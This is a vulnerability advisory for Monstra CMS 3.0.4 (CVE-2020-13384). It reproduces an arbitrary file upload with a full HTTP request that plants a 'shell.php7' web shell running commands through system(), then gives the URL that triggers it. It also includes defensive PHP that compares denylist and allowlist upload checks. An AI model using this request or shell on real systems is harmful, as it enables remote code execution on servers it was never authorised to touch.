# (CVE-2020-13384) Monstra CMS 3.0.4 Arbitrary File Upload Vulnerability

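## 1. Vulnerability Overview

Monstra CMS is a lightweight PHP-based content management system (CMS) by the Ukrainian software developer Sergey Romanenko. The index.php script in Monstra CMS 3.0.4 contains a security vulnerability caused by the program not correctly validating file extensions. A remote attacker can exploit it with a specially crafted HTTP request to upload and execute arbitrary PHP code.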

## 2. Affected Versions

Monstra CMS 3.0.4

## 3. Reproduction Steps

Visit `https://www.0-sec.org/monstra/admin/index.php?id=filesmanager&path=uploads/`

```http
POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
Host: www.0-sec.org
Content-Length: 548
Cache-Control: max-age=0
Origin: https://www.0-sec.org
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.0-sec.org/monstra/admin/index.php?id=filesmanager
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
Connection: close

------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="csrf"

2e6ae2353998caa319aae262b113c6b3f17a9636
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="file"; filename="shell.php7"
Content-Type: application/octet-stream

"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "

"; die; }?>

------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="upload_file"

Upload
------WebKitFormBoundarytRfyCkYq8NvztDBf--
```

`https://www.0-sec.org/monstra/public/uploads/shell.php7?cmd=id`
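The root cause named in the overview, incomplete extension validation, is shown here as an added example (not code from Monstra or from the original post) that contrasts a denylist check with an allowlist check on upload filenames. The denylist and allowlist contents, the function names and the sample filenames are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed denylist for illustration (not Monstra's source): any suffix
// the web server maps to PHP but the list omits is accepted.
const DENYLIST = ['php', 'php3', 'php4', 'php5', 'phtml', 'phps'];
// Assumed allowlist: only the file types this site needs to accept.
const ALLOWLIST = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

function denylist_accepts(string $name): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return !in_array($ext, DENYLIST, true);
}

// Returns a server-generated storage name, or null if the upload is refused.
function allowlist_store_name(string $name): ?string
{
    $base = basename(str_replace('\\', '/', $name));
    // Refuse control bytes and anything that is not "stem.ext" with a single
    // dot, which also rejects dotfiles (.htaccess) and names like a.php.jpg.
    if (preg_match('/[\x00-\x1f]/', $base) || substr_count($base, '.') !== 1) {
        return null;
    }
    [$stem, $ext] = explode('.', strtolower($base));
    if ($stem === '' || !in_array($ext, ALLOWLIST, true)) {
        return null;
    }
    // Never reuse the client-supplied name on disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample filenames; shell.php7 is the name used in the request above.
$samples = ['photo.JPG', 'report.pdf', 'shell.php7', 'shell.php', 'a.php.jpg', '.htaccess'];
foreach ($samples as $s) {
    printf(
        "%-12s denylist=%-6s allowlist=%s\n",
        $s,
        denylist_accepts($s) ? 'accept' : 'reject',
        allowlist_store_name($s) === null ? 'reject' : 'accept'
    );
}
```

Extension checks are only one layer: the upload directory should also be configured so that the web server never passes files stored there to the PHP handler.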
